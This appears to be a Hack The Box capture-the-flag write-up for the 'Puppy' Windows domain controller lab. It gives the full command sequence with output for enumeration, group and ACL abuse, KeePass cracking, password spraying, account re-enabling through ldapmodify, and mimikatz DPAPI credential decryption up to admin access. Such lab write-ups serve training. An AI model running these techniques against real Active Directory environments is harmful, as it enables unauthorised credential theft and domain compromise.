Puppy HTB
Machine Information:
Puppy is a medium windows box.
As is common in real life pentests, we will start the Puppy box with credentials for the following account:
levi.james / KingofAkron2025!
Tools Used:
- nmap
- enun4linux
- NetExec
- Certipy
- Bloodhound
- ntpdate
- targetedKerberoast
- john / keepass2john
- evil-winrm
- pwsafe
- impacket
- samba-common-bin (net)
- ldapsearch
- ldapmodify
Walk-through:
Nmap Reconnaissance:
Initiating a standard nmap scan to check for open ports, what services they are running and their versions.
nmap -A -vv -oA nmap/puppy 10.10.11.70
Output:
# Nmap 7.95 scan initiated Sat May 17 22:52:17 2025 as: /usr/lib/nmap/nmap --privileged -A -vv -oA nmap/puppy 10.10.11.70
Nmap scan report for 10.10.11.70
Host is up, received echo-reply ttl 127 (0.21s latency).
Scanned at 2025-05-17 22:52:17 EDT for 343s
Not shown: 985 filtered tcp ports (no-response)
Bug in iscsi-info: no string output.
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-18 09:52:52Z)
111/tcp open rpcbind syn-ack ttl 127 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
2049/tcp open nlockmgr syn-ack ttl 127 1-4 (RPC #100021)
3260/tcp open iscsi? syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=5/17%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=68294CB8%P=x86_64-pc-linux-gnu)
SEQ(SP=107%GCD=1%ISR=10B%TI=I%II=I%SS=S%TS=A)
SEQ(SP=FE%GCD=1%ISR=108%TI=I%II=I%SS=S%TS=A)
OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M53CNW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)
Uptime guess: 0.294 days (since Sat May 17 15:54:45 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 62785/tcp): CLEAN (Timeout)
| Check 2 (port 58506/tcp): CLEAN (Timeout)
| Check 3 (port 26380/udp): CLEAN (Timeout)
| Check 4 (port 57090/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-05-18T09:55:02
|_ start_date: N/A
|_clock-skew: 7h00m02s
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 206.69 ms 10.10.14.1
2 207.32 ms 10.10.11.70
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 17 22:58:00 2025 -- 1 IP address (1 host up) scanned in 343.53 seconds
Based off the nmap scan results, we've identified that the the target device is a domain controller within the domain of 'PUPPY.HTB' (Most likely a Windows Server 2022).
Enum4Linux Recon
For further information and to verify the privileges of our initial access account we can run enum4linux to have an initial scan of the environment:
enum4linux -u levi.james -p KingofAkron2025! -a puppy.htb
Enum4linux provides us an extract of all users within the domain, we can instantly direct our attention towards the 'steph.cooper' account, as the user has an admin account with the name of 'steph.cooper_adm' the accounts might potentially be sharing credentials.
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[levi.james] rid:[0x44f]
user:[ant.edwards] rid:[0x450]
user:[adam.silver] rid:[0x451]
user:[jamie.williams] rid:[0x452]
user:[steph.cooper] rid:[0x453]
user:[steph.cooper_adm] rid:[0x457]
Enum4linux also outputs all the SMB shares, we can see that there is a custom Dev share that might be worth having a look at once we have access.
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk DEV-SHARE for PUPPY-DEVS
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
With an output of the AD groups, most likely any user with the 'Developers' OR 'Senior Devs' group might be able to access the DEV SMB share.
Group: 'DEVELOPERS' (RID: 1113) has member: PUPPY\ant.edwards
Group: 'DEVELOPERS' (RID: 1113) has member: PUPPY\adam.silver
Group: 'DEVELOPERS' (RID: 1113) has member: PUPPY\jamie.williams
Group: 'Domain Users' (RID: 513) has member: PUPPY\Administrator
Group: 'Domain Users' (RID: 513) has member: PUPPY\krbtgt
Group: 'Domain Users' (RID: 513) has member: PUPPY\levi.james
Group: 'Domain Users' (RID: 513) has member: PUPPY\ant.edwards
Group: 'Domain Users' (RID: 513) has member: PUPPY\adam.silver
Group: 'Domain Users' (RID: 513) has member: PUPPY\jamie.williams
Group: 'Domain Users' (RID: 513) has member: PUPPY\steph.cooper
Group: 'Domain Users' (RID: 513) has member: PUPPY\steph.cooper_adm
Group: 'Enterprise Admins' (RID: 519) has member: PUPPY\Administrator
Group: 'Schema Admins' (RID: 518) has member: PUPPY\Administrator
Group: 'Group Policy Creator Owners' (RID: 520) has member: PUPPY\Administrator
Group: 'Domain Admins' (RID: 512) has member: PUPPY\Administrator
Group: 'HR' (RID: 1108) has member: PUPPY\levi.james
Group: 'Domain Guests' (RID: 514) has member: PUPPY\Guest
Group: 'SENIOR DEVS' (RID: 1109) has member: PUPPY\ant.edwards
Group: 'Domain Controllers' (RID: 516) has member: PUPPY\DC$
Bloodhound
We will start our Bloodhound community instance:
sudo docker-compose -f /opt/bloodhoundce/docker-compose.yml up
We will then use Levi's account to enumerate all the data in bloodhound compatible format and upload it directly..
sudo bloodhound-ce-python -d puppy.htb -u levi.james -p 'KingofAkron2025!' -ns 10.10.11.70 -c all
Escalation Of Privilege:
As Levi is a member of the HR group, we are able to use HR's generic write over the Developer group to enroll Levi directly into the developer group.
net rpc group addmem "developers@puppy.htb" "levi.james" -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S "puppy.htb"
We can then list the SMB shares and confirm that we can access the DEV share.
nxc smb puppy.htb -u levi.james -p KingofAkron2025! --shares
Output:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk DEV-SHARE for PUPPY-DEVS
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMBClient & KeePass Cracking
As we can access the DEV share, we can use smbclient to authenticate and view the contents of the SMB share.
smbclient //puppy.htb/dev -U levi.james%KingofAkron2025!
Output:
smb: \> ls
. DR 0 Tue May 20 14:20:39 2025
.. D 0 Sat Mar 8 11:52:57 2025
KeePassXC-2.7.9-Win64.msi A 34394112 Sun Mar 23 03:09:12 2025
Projects D 0 Sat Mar 8 11:53:36 2025
recovery.kdbx A 2677 Tue Mar 11 22:25:46 2025
The most notable output here is the recovery.kdbx file. This is a KeePassXC we can download it directly.
get recovery.kdbx
We can use keepass2john to convert the recovery.kdbx file and output it to a hash.
/modules/john/run/keepass2john recovery.kdbx > hash
From there we can run john to try and crack the KeePass hash using a common wordlist.
~/modules/john/run/john --wordlist=/usr/share/wordlists/rockyou.txt hash
Output:
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [AES/Argon2 128/128 SSE2])
Cost 1 (t (rounds)) is 37 for all loaded hashes
Cost 2 (m) is 65536 for all loaded hashes
Cost 3 (p) is 4 for all loaded hashes
Cost 4 (KDF [0=Argon2d 2=Argon2id 3=AES]) is 0 for all loaded hashes
Will run 8 OpenMP threads
Note: Passwords longer than 41 [worst case UTF-8] to 124 [ASCII] rejected
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Failed to use huge pages (not pre-allocated via sysctl? that's fine)
liverpool (recovery)
1g 0:00:00:05 DONE (2025-05-21 02:04) 0.1686g/s 6.745p/s 6.745c/s 6.745C/s purple..123123
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We can view that the password for the recovery database file is 'liverpool'
~/modules/john/run/john hash --show
recovery:liverpool
We can then launch the keepass file and enter the recovered password.
keepassxc recovery.kdbx
Within the KeePass database file we identified the following credentials:
ADAM.SILVER:HJKL2025!
ANT.EDWARDS:Antman2025!
JAMIE.WILLIAMS:JamieLove2025!
SAMUEL.BLAKE:ILY2025!
STEVE.TUCKER:Steve2025!
Password Spraying
As we now have a large amount of usernames and passwords we can compile them into a list, and conduct a password spray.
nxc smb puppy.htb -u users -p passwords --continue-on-success --no-bruteforce
Output:
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\ant.edwards:Antman2025!
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\samuel.blake:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steve.tucker:Steve2025! STATUS_LOGON_FAILURE
We can verify that the credential pair ant.edwards:Antman2025! works.
Further Privilege Escalation
The Ant Edwards account is a member of the Senior Dev group, which has GenericAll access over Adam Silvers account.
We can then use net rpc to change the password of "adam.silver".
net rpc password "adam.silver" "newP@ssword2022" -U "puppy"/"ant.edwards"%'Antman2025!' -S "puppy.htb"
From there we can use evil-winrm to connect to attempt to connect to the target machine using adam's account.
evil-winrm -i 10.10.11.70 -u adam.silver -p newP@ssword2022
Output:
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
The evil-winrm connection doesn't work as the account is disabled.
Using the ldapsearch module we can directly look at the userAccountControl property.
ldapsearch -x -H ldap://10.10.11.70 -D "ant.edwards@puppy.htb" -w 'Antman2025!' -b "dc=puppy,dc=htb" "(sAMAccountName=adam.silver)" userAccountControl
# extended LDIF
#
# LDAPv3
# base <dc=puppy,dc=htb> with scope subtree
# filter: (sAMAccountName=adam.silver)
# requesting: userAccountControl
#
# Adam D. Silver, Users, PUPPY.HTB
dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
userAccountControl: 66050
# search reference
ref: ldap://ForestDnsZones.PUPPY.HTB/DC=ForestDnsZones,DC=PUPPY,DC=HTB
# search reference
ref: ldap://DomainDnsZones.PUPPY.HTB/DC=DomainDnsZones,DC=PUPPY,DC=HTB
# search reference
ref: ldap://PUPPY.HTB/CN=Configuration,DC=PUPPY,DC=HTB
# search result
search: 2
result: 0 Success
# numResponses: 5
# numEntries: 1
# numReferences: 3
Based off the results of ldapsearch, userAccountControl is set to 66050.
Usually to disable a user's account, you would need to set the UserAccountControl to the current value + 2 for example: 514 (2 + 512).
So to enable it we would need to set it to 66048 (66050-2)
Through ldapmodify module we can set userAccountControl to 66048:
ldapmodify -x -H ldap://10.10.11.70 -D "ant.edwards@puppy.htb" -w 'Antman2025!' <<EOF
dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
changetype: modify
replace: userAccountControl
userAccountControl: 66048
EOF
We can now use evil-winrm to remote onto the target device.
evil-winrm -i 10.10.11.70 -u adam.silver -p newP@ssword2022
Pivoting to another user account
In the root C Directory we can find a site-backup file.
cd C:\Backups
We can download the following sitebackup zip file.
download site-backup-2024-12-30.zip
Unzipping it back on our attacking device we can then find a config file.
unzip site-backup-2024-12-30.zip
cat nms-auth-config.xml.bak
Output:
<server>
<host>DC.PUPPY.HTB</host>
<port>389</port>
<base-dn>dc=PUPPY,dc=HTB</base-dn>
<bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
<bind-password>ChefSteph2025!</bind-password>
</server>
After having a quick look at the config file we find the below credentials:
steph.cooper:ChefSteph2025!
We can use this to directly remote onto the target device
evil-winrm -i 10.10.11.70 -u 'steph.cooper' -p 'ChefSteph2025!'
Priv Esc Vectors
Steph Cooper doesn't have any additional access however it is important to note that Steph Cooper does also have an admin account, so looking at any potential instances of credentials being shared across both accounts will be an extremely likely privilege escalation vector.
Reading DPAPI with Mimikatz
We can attempt to privesc through Dpapi, after navigating to 'C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107' and executing 'gci -force' we can find the location DPAPI masterkey.
gci -force
Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 7:40 AM 740 556a2412-1275-4ccf-b721-e6a0b4f90407
-a-hs- 2/23/2025 2:36 PM 24 Preferred
We can use mimikatz, to get the DPAPI master key through rpc authentication.
mimikatz.exe "dpapi::masterkey /in:C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407 /rpc" "exit"
Output:
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # dpapi::masterkey /in:C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407 /rpc
**MASTERKEYS**
dwVersion : 00000002 - 2
szGuid : {556a2412-1275-4ccf-b721-e6a0b4f90407}
dwFlags : 00000000 - 0
dwMasterKeyLen : 00000088 - 136
dwBackupKeyLen : 00000068 - 104
dwCredHistLen : 00000000 - 0
dwDomainKeyLen : 00000174 - 372
[masterkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : b23f3121344180480064e02b82150b9a
rounds : 00004650 - 18000
algHash : 00008009 - 32777 (CALG_HMAC)
algCrypt : 00006603 - 26115 (CALG_3DES)
pbKey : fb531b9368acdcf185c7f1e3f8d88318fe24ad0704732ef232fb626a50bcb897ecfdebf0982651eeaef634650c38cc3870e866f2b3ae02253946c2d2d9b883fe1fc0521f31606ad3f7cb9055281145af975fc142520a0187c8a155c884d46d73e2a7aa35d5ef0f81
[backupkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 820779384e02113e2f0fcd4e73ddb332
rounds : 00004650 - 18000
algHash : 00008009 - 32777 (CALG_HMAC)
algCrypt : 00006603 - 26115 (CALG_3DES)
pbKey : 27b10adc59892b80c774c4b7408c217db84b8a0b69b3b030b46bc00ec6043147dde0989c615265560d0de3efe2c2457e8959dd4bfcd973926c437a18a577a32da0ede777dd1fe5d0
[domainkey]
**DOMAINKEY**
dwVersion : 00000002 - 2
dwSecretLen : 00000100 - 256
dwAccesscheckLen : 00000058 - 88
guidMasterKey : {3ec516f3-8016-4236-bacf-b9a90ea50992}
pbSecret : 48c6dee438ddf25fb827cba81d28ade3e7b50472486cedbcbb0b7247197643bb64e9efe38e5a91392c43a10507737ee38d5b67e1255da2e0df9b9da4cd94f656178ee80d03aa30e5101d7d41bce7f414e9186e32ecff06b86c8df35b1b3682cdf38c967b5980d7909264f1f1f1fae8bfa63074b40483b1fcbf2bfd662786841470be9be9e204eeaf449619a99ced6379f74c3c569f7c2759f7b774c5f07da8b570a39e933d9ba7b13224df5a94d67cdf451622f6682ec6cebfc56a6ce5310e44e5002793addbd93fdd3099e9e68214f1c0cfabe4425514b171d02050e0193313ecf4273b0540fe1115533148bf269ecc95580ad5c21e8a9025fe0673e5ab3238
pbAccesscheck : 99db4e12dadb294b01fd2f6966463c541668845f73c9e2da25645258023bb6c8f580c8c03c93190c34633fef444fc426fb41e1b089756f8472793c4d46e89374864281312f72394e6d9afc5ebfa2c71cf5895c8962849aa4
Auto SID from path seems to be: S-1-5-21-1487982659-1829050783-2281216199-1107
[backupkey] without DPAPI_SYSTEM:
key : 1a943a912fa315c7f9eced48870b613d9e75b467d13d618bbad9262ef3f2c567
sha1: 469928729f9405d7ba46a22de53071b2e1d81fb9
[domainkey] with RPC
[DC] 'PUPPY.HTB' will be the domain
[DC] 'DC.PUPPY.HTB' will be the DC server
key : d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
sha1: 3c3cf2061dd9d45000e9e6b49e37c7016e98e701
mimikatz(commandline) # exit
Bye!
Now that we have the masterkey, we can look at common Credential spots to see if we can find any saved credentials for Steph Coopers admin account.
1st Spot:
gci -force
Directory: C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 8:14 AM 11068 DFBE70A7E5CC19A398EBF1B96859CE5D
2nd Spot:
gci -force
Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 7:54 AM 414 C8D69EBE9A43E9DEBF6B5FBD48B521B9
3rd Spot:
gci -force
Directory: C:\Users\steph.cooper\AppData\Local\Microsoft\Vault
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/23/2025 2:36 PM 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
We can execute the below commands to try and decrypt the Password files directly using the masterkey.
.\mimikatz.exe "dpapi::cred /in:C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D /unprotect /masterkey:d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84" "exit"
.\mimikatz.exe "dpapi::cred /in:C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9 /unprotect /masterkey:d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84" "exit"
.\mimikatz.exe "dpapi::cred /in:C:\Users\steph.cooper\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 /unprotect /masterkey:d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84" "exit"
Eventually we get a hit on a credential.
We can see that steph.cooper did save the credentials for steph.cooper_adm.
Decrypting Credential:
* using CryptUnprotectData API
* masterkey : d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 000000c8 - 200
credUnk0 : 00000000 - 0
Type : 00000002 - 2 - domain_password
Flags : 00000000 - 0
LastWritten : 3/8/2025 3:54:29 PM
unkFlagsOrSize : 00000030 - 48
Persist : 00000003 - 3 - enterprise
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : Domain:target=PUPPY.HTB
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : steph.cooper_adm
CredentialBlob : ****************
Attributes : 0
We can now directly access the device as Admin:
evil-winrm -i 10.10.11.70 -u steph.cooper_adm -p **********